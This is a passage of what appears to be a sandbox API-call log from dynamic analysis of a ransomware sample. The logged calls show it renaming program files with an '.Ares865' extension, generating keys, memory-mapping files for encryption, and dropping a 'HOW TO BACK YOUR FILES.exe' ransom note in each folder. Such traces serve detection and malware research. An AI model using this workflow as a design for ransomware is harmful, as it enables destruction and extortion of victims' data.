Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll.Ares865") returned 101 [0125.641] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationprovider.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationprovider.dll.ares865"), dwFlags=0x1) returned 1 [0125.644] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationProvider.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationprovider.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.644] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=40960) returned 1 [0125.644] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.645] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.645] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.646] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa300, lpName=0x0) returned 0x170 [0125.647] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa300) returned 0x190000 [0125.653] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.653] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.653] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.654] lstrcpyW (in: lpString1=0x2cce48a, lpString2="UIAutomationTypes.dll" | out: lpString1="UIAutomationTypes.dll") returned="UIAutomationTypes.dll" [0125.655] lstrlenW (lpString="UIAutomationTypes.dll") returned 21 [0125.655] lstrlenW (lpString="Ares865") returned 7 [0125.655] lstrcmpiW (lpString1="pes.dll", lpString2="Ares865") returned 1 [0125.655] lstrlenW (lpString=".dll") returned 4 [0125.655] lstrcmpiW (lpString1="UIAutomationTypes.dll", lpString2=".dll") returned 1 [0125.655] lstrlenW (lpString=".lnk") returned 4 [0125.655] lstrcmpiW (lpString1="UIAutomationTypes.dll", lpString2=".lnk") returned 1 [0125.655] lstrlenW (lpString=".ini") returned 4 [0125.655] lstrcmpiW (lpString1="UIAutomationTypes.dll", lpString2=".ini") returned 1 [0125.655] lstrlenW (lpString=".sys") returned 4 [0125.655] lstrcmpiW (lpString1="UIAutomationTypes.dll", lpString2=".sys") returned 1 [0125.655] lstrlenW (lpString="UIAutomationTypes.dll") returned 21 [0125.655] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll.Ares865") returned 98 [0125.655] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationtypes.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationtypes.dll.ares865"), dwFlags=0x1) returned 1 [0125.657] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\UIAutomationTypes.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\uiautomationtypes.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.658] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=98304) returned 1 [0125.658] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.659] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.659] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.659] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18300, lpName=0x0) returned 0x170 [0125.661] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18300) returned 0x190000 [0125.676] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.677] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.677] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.679] lstrcpyW (in: lpString1=0x2cce48a, lpString2="WindowsBase.dll" | out: lpString1="WindowsBase.dll") returned="WindowsBase.dll" [0125.679] lstrlenW (lpString="WindowsBase.dll") returned 15 [0125.679] lstrlenW (lpString="Ares865") returned 7 [0125.679] lstrcmpiW (lpString1="ase.dll", lpString2="Ares865") returned 1 [0125.679] lstrlenW (lpString=".dll") returned 4 [0125.679] lstrcmpiW (lpString1="WindowsBase.dll", lpString2=".dll") returned 1 [0125.679] lstrlenW (lpString=".lnk") returned 4 [0125.679] lstrcmpiW (lpString1="WindowsBase.dll", lpString2=".lnk") returned 1 [0125.679] lstrlenW (lpString=".ini") returned 4 [0125.679] lstrcmpiW (lpString1="WindowsBase.dll", lpString2=".ini") returned 1 [0125.679] lstrlenW (lpString=".sys") returned 4 [0125.679] lstrcmpiW (lpString1="WindowsBase.dll", lpString2=".sys") returned 1 [0125.679] lstrlenW (lpString="WindowsBase.dll") returned 15 [0125.679] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll.Ares865") returned 92 [0125.680] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\windowsbase.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\windowsbase.dll.ares865"), dwFlags=0x1) returned 1 [0125.682] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsBase.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\windowsbase.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.682] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1253376) returned 1 [0125.682] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.683] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.683] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.684] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x132300, lpName=0x0) returned 0x170 [0125.685] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x132300) returned 0x3030000 [0125.864] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.864] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.864] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.882] lstrcpyW (in: lpString1=0x2cce48a, lpString2="WindowsFormsIntegration.dll" | out: lpString1="WindowsFormsIntegration.dll") returned="WindowsFormsIntegration.dll" [0125.882] lstrlenW (lpString="WindowsFormsIntegration.dll") returned 27 [0125.882] lstrlenW (lpString="Ares865") returned 7 [0125.882] lstrcmpiW (lpString1="ion.dll", lpString2="Ares865") returned 1 [0125.882] lstrlenW (lpString=".dll") returned 4 [0125.882] lstrcmpiW (lpString1="WindowsFormsIntegration.dll", lpString2=".dll") returned 1 [0125.882] lstrlenW (lpString=".lnk") returned 4 [0125.882] lstrcmpiW (lpString1="WindowsFormsIntegration.dll", lpString2=".lnk") returned 1 [0125.882] lstrlenW (lpString=".ini") returned 4 [0125.882] lstrcmpiW (lpString1="WindowsFormsIntegration.dll", lpString2=".ini") returned 1 [0125.882] lstrlenW (lpString=".sys") returned 4 [0125.882] lstrcmpiW (lpString1="WindowsFormsIntegration.dll", lpString2=".sys") returned 1 [0125.882] lstrlenW (lpString="WindowsFormsIntegration.dll") returned 27 [0125.883] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll.Ares865") returned 104 [0125.883] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\windowsformsintegration.dll"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\windowsformsintegration.dll.ares865"), dwFlags=0x1) returned 1 [0125.885] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll.Ares865" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\windowsformsintegration.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.885] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=94208) returned 1 [0125.886] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.886] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.887] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.887] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17300, lpName=0x0) returned 0x170 [0125.888] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17300) returned 0x190000 [0125.893] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.893] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.894] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.895] lstrcpyW (in: lpString1=0x2cce48a, lpString2="WinFXList.xml.Ares865" | out: lpString1="WinFXList.xml.Ares865") returned="WinFXList.xml.Ares865" [0125.896] lstrlenW (lpString="WinFXList.xml.Ares865") returned 21 [0125.896] lstrlenW (lpString="Ares865") returned 7 [0125.896] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0125.896] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x812df993, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c36dac1, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5230b460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xd20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WinFXList.xml.Ares865", cAlternateFileName="WINFXL~1.ARE")) returned 0 [0125.896] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0125.896] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7af0 [0125.896] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList") returned="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList" [0125.896] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList" | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList") returned="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList" [0125.896] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0125.896] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\subsetlist\\how to back your files.exe"), bFailIfExists=1) returned 0 [0125.897] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0125.898] GetLastError () returned 0x0 [0125.898] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0125.898] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5230b460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5230b460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0125.898] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0125.898] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0125.899] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="Client.xml.Ares865" | out: lpString1="Client.xml.Ares865") returned="Client.xml.Ares865" [0125.899] lstrlenW (lpString="Client.xml.Ares865") returned 18 [0125.899] lstrlenW (lpString="Ares865") returned 7 [0125.899] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0125.899] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5230b460, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5230b460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0125.899] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0125.899] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5230b460, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5230b460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0125.899] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0125.899] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ad0 [0125.899] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList") returned="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList" [0125.899] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList" | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList") returned="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList" [0125.899] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0125.899] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\how to back your files.exe"), bFailIfExists=1) returned 0 [0125.900] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0125.901] GetLastError () returned 0x0 [0125.901] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0125.901] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5237d880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5237d880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0125.901] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0125.901] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0125.901] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="FrameworkList.xml.Ares865" | out: lpString1="FrameworkList.xml.Ares865") returned="FrameworkList.xml.Ares865" [0125.901] lstrlenW (lpString="FrameworkList.xml.Ares865") returned 25 [0125.901] lstrlenW (lpString="Ares865") returned 7 [0125.901] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0125.901] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5230b460, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5230b460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0125.901] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0125.901] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5230b460, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5230b460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0125.901] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0125.901] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ab0 [0125.901] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Mozilla Maintenance Service", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service") returned="C:\\Program Files (x86)\\Mozilla Maintenance Service" [0125.902] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Mozilla Maintenance Service" | out: lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service") returned="C:\\Program Files (x86)\\Mozilla Maintenance Service" [0125.902] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0125.902] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\how to back your files.exe"), bFailIfExists=1) returned 0 [0125.903] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0125.903] GetLastError () returned 0x0 [0125.903] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0125.903] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf770e60, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5237d880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5237d880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0125.903] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0125.903] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0125.904] lstrcpyW (in: lpString1=0x2cce466, lpString2="maintenanceservice.exe" | out: lpString1="maintenanceservice.exe") returned="maintenanceservice.exe" [0125.904] lstrlenW (lpString="maintenanceservice.exe") returned 22 [0125.904] lstrlenW (lpString="Ares865") returned 7 [0125.904] lstrcmpiW (lpString1="ice.exe", lpString2="Ares865") returned 1 [0125.904] lstrlenW (lpString=".dll") returned 4 [0125.904] lstrcmpiW (lpString1="maintenanceservice.exe", lpString2=".dll") returned 1 [0125.904] lstrlenW (lpString=".lnk") returned 4 [0125.904] lstrcmpiW (lpString1="maintenanceservice.exe", lpString2=".lnk") returned 1 [0125.904] lstrlenW (lpString=".ini") returned 4 [0125.904] lstrcmpiW (lpString1="maintenanceservice.exe", lpString2=".ini") returned 1 [0125.904] lstrlenW (lpString=".sys") returned 4 [0125.904] lstrcmpiW (lpString1="maintenanceservice.exe", lpString2=".sys") returned 1 [0125.904] lstrlenW (lpString="maintenanceservice.exe") returned 22 [0125.904] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe.Ares865") returned 81 [0125.904] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\maintenanceservice.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\maintenanceservice.exe.ares865"), dwFlags=0x1) returned 1 [0125.906] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\maintenanceservice.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.906] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=119408) returned 1 [0125.907] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.907] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.907] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.908] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d570, lpName=0x0) returned 0x170 [0125.909] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d570) returned 0x190000 [0125.915] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, 